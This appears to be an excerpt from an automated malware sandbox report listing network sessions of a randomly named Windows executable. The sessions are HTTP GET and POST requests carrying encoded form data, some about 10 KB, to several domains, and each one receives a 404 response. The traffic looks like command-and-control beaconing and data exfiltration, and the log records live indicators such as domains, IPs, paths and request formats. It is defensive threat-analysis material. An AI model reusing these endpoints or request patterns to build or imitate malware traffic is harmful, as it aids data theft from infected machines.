                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            20 | 192.168.2.4 | 55739 | 31.31.196.178 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:22.308820009 CET | 538 | OUT | GET /p6ze/?X8Rx1=znhhIbB8nN&zhl=/DXHDBoOk7chmVCQ4WrLaW1oMwdAaAsuBp0o9+oEddPaOIwOYOKBw5izboW0tBTgA9UkGMI+Rx3Lys9/a+AsrILRafTHrYx9fF0ImMQ3N0L+QaVHJSdbugw= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.dverkom.store
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:24:23.207484961 CET | 330 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:23 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            21 | 192.168.2.4 | 55740 | 172.96.187.60 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:28.463275909 CET | 793 | OUT | POST /s20z/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dalong.site
                                                                            Origin: http://www.dalong.site
                                                                            Connection: close
                                                                            Content-Length: 200
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.dalong.site/s20z/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Ascii: zhl=Dn3NQm9zA3LJOM6dfCGiBKqLGCz3VAwFYqdk/OKDKEL3JbRrNZsz+CrAqPdJxGp6G2PfDuDyKBFc/3LdA2yxM9bN8CsAn4PiZvgLqNR0tpQFkHBQ+urK/fc/9NLk/3Bqw977pvxGxzj3i5iGd1uEpykyDzAOxxUSf1QaoiASqP0OoRRGWXPBgL5wKi8KmjcAUQ==
                                                                            Nov 5, 2024 15:24:29.117005110 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Tue, 05 Nov 2024 14:24:29 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            22 | 192.168.2.4 | 55741 | 172.96.187.60 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:31.001791954 CET | 813 | OUT | POST /s20z/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dalong.site
                                                                            Origin: http://www.dalong.site
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.dalong.site/s20z/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Ascii: zhl=Dn3NQm9zA3LJc8KddheiKKr5Kiz3egwBYqRk/P/eKWf3I+VrOcMzuSrAhvdM8mpHG2CiDv/yKAhc/1TdAlqyNtbPoysCqYPiZvgLqNURtpIFk3xQ+PrV3/c8+NLk73Buw97JptUTxxL3i4SGdnGD8CkwNTBQ60gdXnJbphUIquwqg3AcHmuWyLdDXl1+rghJPceTJaaxm1IhcJrV5wvwk2A=
                                                                            Nov 5, 2024 15:24:31.683357954 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Tue, 05 Nov 2024 14:24:31 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            23 | 192.168.2.4 | 55742 | 172.96.187.60 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:33.551889896 CET | 10895 | OUT | POST /s20z/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dalong.site
                                                                            Origin: http://www.dalong.site
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.dalong.site/s20z/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 44 6e 33 4e 51 6d 39 7a 41 33 4c 4a 63 38 4b 64 64 68 65 69 4b 4b 72 35 4b 69 7a 33 65 67 77 42 59 71 52 6b 2f 50 2f 65 4b 57 6e 33 49 4d 64 72 4f 36 45 7a 38 43 72 41 73 50 64 4e 38 6d 70 67 47 31 79 6d 44 76 79 51 4b 44 4a 63 2f 55 7a 64 55 45 71 79 45 74 62 50 71 79 73 44 6e 34 50 33 5a 76 77 50 71 4e 45 52 74 70 49 46 6b 31 70 51 34 65 72 56 78 2f 63 2f 39 4e 4c 34 2f 33 42 47 77 39 69 38 70 74 52 6f 78 41 72 33 6a 59 43 47 63 55 75 44 2b 69 6b 2b 4f 54 42 59 36 30 6c 64 58 6e 56 74 70 67 51 32 71 75 45 71 67 32 46 36 51 47 2b 42 71 6f 68 5a 42 48 6c 63 73 44 78 4f 58 74 4c 70 4a 49 79 59 69 6e 34 51 52 62 4f 46 6c 41 58 74 2f 43 70 4f 64 46 4f 59 6b 64 52 36 31 4c 49 77 5a 73 43 61 2b 6f 30 33 30 61 50 4e 73 6b 78 48 37 77 54 55 61 73 53 79 5a 7a 78 73 59 67 6e 42 43 53 69 50 50 6b 4e 46 4d 46 6f 54 2f 69 6c 73 2f 49 74 78 52 31 6b 33 61 49 78 42 73 68 47 30 4a 41 67 58 43 61 32 7a 75 31 6e 6b 6e 77 45 4e 50 2f 58 4c 30 36 6f 73 62 48 76 50 4b 6d 6b 62 55 31 31 7a 32 45 61 56 66 63 [TRUNCATED]
                                                                            Nov 5, 2024 15:24:34.222491980 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Tue, 05 Nov 2024 14:24:34 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            24 | 192.168.2.4 | 55743 | 172.96.187.60 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:36.092660904 CET | 536 | OUT | GET /s20z/?zhl=OlftTQ9hFz7OT6WFYxCuNpq7ExDWc0YdDdpK6+ifbkXRCNh9PINbo2rFvrFH3ENsTzWiAtX7VHJc4HngX2meKMfLmgA8ppz9ceAA4uFOpb8+rhwBxtyr4dg=&X8Rx1=znhhIbB8nN HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.dalong.site
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:24:36.741720915 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Tue, 05 Nov 2024 14:24:36 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            25 | 192.168.2.4 | 55744 | 161.97.142.144 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:41.957206011 CET | 799 | OUT | POST /jkxr/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.030002304.xyz
                                                                            Origin: http://www.030002304.xyz
                                                                            Connection: close
                                                                            Content-Length: 200
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.030002304.xyz/jkxr/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Ascii: zhl=qdxGrHD/abS94ANs4pbEwRPn/a9iXqaNk8GkPodj3bjXS2mTGmZ2/68CkRm1QH6RtoNrGF9sa3+mdOU5Ah0n5hmzEHJaLUM1jwArY29XBSLMaMC3vd7ctnIlFeMzFrq+yfgvOzz7rBeNwTTJewJMVZJ8L8f9sMOKx6jkHrbtMyIjctY7xRVah55VGFAEsQxNDg==
                                                                            Nov 5, 2024 15:24:42.789812088 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:42 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: W/"66cce1df-b96"
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                            Nov 5, 2024 15:24:42.789833069 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            26 | 192.168.2.4 | 55745 | 161.97.142.144 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:44.715219021 CET | 819 | OUT | POST /jkxr/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.030002304.xyz
                                                                            Origin: http://www.030002304.xyz
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.030002304.xyz/jkxr/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 71 64 78 47 72 48 44 2f 61 62 53 39 35 6a 56 73 36 4b 44 45 68 78 50 67 6a 4b 39 69 59 4b 61 4a 6b 38 36 6b 50 73 4e 56 30 74 7a 58 53 57 57 54 48 69 46 32 38 36 38 43 75 78 6e 2f 50 58 36 50 74 6f 4a 53 47 48 70 73 61 33 71 6d 64 4d 4d 35 41 32 67 34 34 78 6d 39 4d 6e 4a 63 50 55 4d 31 6a 77 41 72 59 32 70 39 42 53 7a 4d 61 2f 61 33 76 38 37 64 6e 48 49 6d 56 2b 4d 7a 54 62 71 36 79 66 67 64 4f 79 75 65 72 44 32 4e 77 57 76 4a 65 68 4a 50 66 5a 4a 36 45 63 65 38 74 38 6a 39 6f 36 32 62 4f 6f 66 55 52 32 51 51 5a 72 4a 68 67 67 30 4e 7a 35 64 6d 62 43 4a 77 68 54 4d 45 59 6a 41 48 64 54 38 66 7a 77 31 6e 38 78 5a 31 73 44 76 73 66 59 45 3d
                                                                            Data Ascii: zhl=qdxGrHD/abS95jVs6KDEhxPgjK9iYKaJk86kPsNV0tzXSWWTHiF2868Cuxn/PX6PtoJSGHpsa3qmdMM5A2g44xm9MnJcPUM1jwArY2p9BSzMa/a3v87dnHImV+MzTbq6yfgdOyuerD2NwWvJehJPfZJ6Ece8t8j9o62bOofUR2QQZrJhgg0Nz5dmbCJwhTMEYjAHdT8fzw1n8xZ1sDvsfYE=
                                                                            Nov 5, 2024 15:24:45.556924105 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:45 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: W/"66cce1df-b96"
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                            Nov 5, 2024 15:24:45.557122946 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            27 | 192.168.2.4 | 55746 | 161.97.142.144 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:47.309850931 CET | 10901 | OUT | POST /jkxr/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.030002304.xyz
                                                                            Origin: http://www.030002304.xyz
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.030002304.xyz/jkxr/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 71 64 78 47 72 48 44 2f 61 62 53 39 35 6a 56 73 36 4b 44 45 68 78 50 67 6a 4b 39 69 59 4b 61 4a 6b 38 36 6b 50 73 4e 56 30 74 37 58 53 6c 75 54 47 44 46 32 39 36 38 43 77 68 6e 38 50 58 37 54 74 73 6b 61 47 48 6b 62 61 78 6d 6d 63 76 45 35 56 33 67 34 78 78 6d 39 4f 6e 4a 64 4c 55 4d 61 6a 77 51 76 59 32 35 39 42 53 7a 4d 61 2b 71 33 70 74 37 64 68 48 49 6c 46 65 4d 2f 46 72 72 64 79 62 30 6e 4f 79 72 72 72 53 57 4e 77 32 66 4a 62 54 68 50 54 5a 4a 34 49 38 66 76 74 38 76 69 6f 36 72 6f 4f 72 44 79 52 78 77 51 55 65 45 37 31 45 41 54 68 36 56 67 4a 42 35 51 76 78 77 76 44 79 45 30 4f 52 31 44 74 7a 35 37 35 43 77 46 38 68 44 38 4b 63 43 75 4d 6c 57 66 32 57 34 76 56 6f 67 70 69 34 6d 65 2f 59 79 4c 6e 51 4d 52 50 52 77 47 6f 35 56 77 61 53 43 45 76 50 76 74 67 64 7a 77 55 48 32 4e 49 70 61 52 56 4b 55 52 34 30 50 70 37 2b 4f 47 31 33 49 59 74 42 78 76 44 64 31 42 54 5a 31 62 42 32 52 65 55 33 5a 75 75 6d 52 55 52 6c 44 7a 32 49 76 75 38 48 47 35 4e 61 39 6f 46 4c 32 34 64 4b 6b 34 78 73 [TRUNCATED]
                                                                            Data Ascii: zhl=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 [TRUNCATED]
                                                                            Nov 5, 2024 15:24:48.166568995 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:48 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: W/"66cce1df-b96"
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
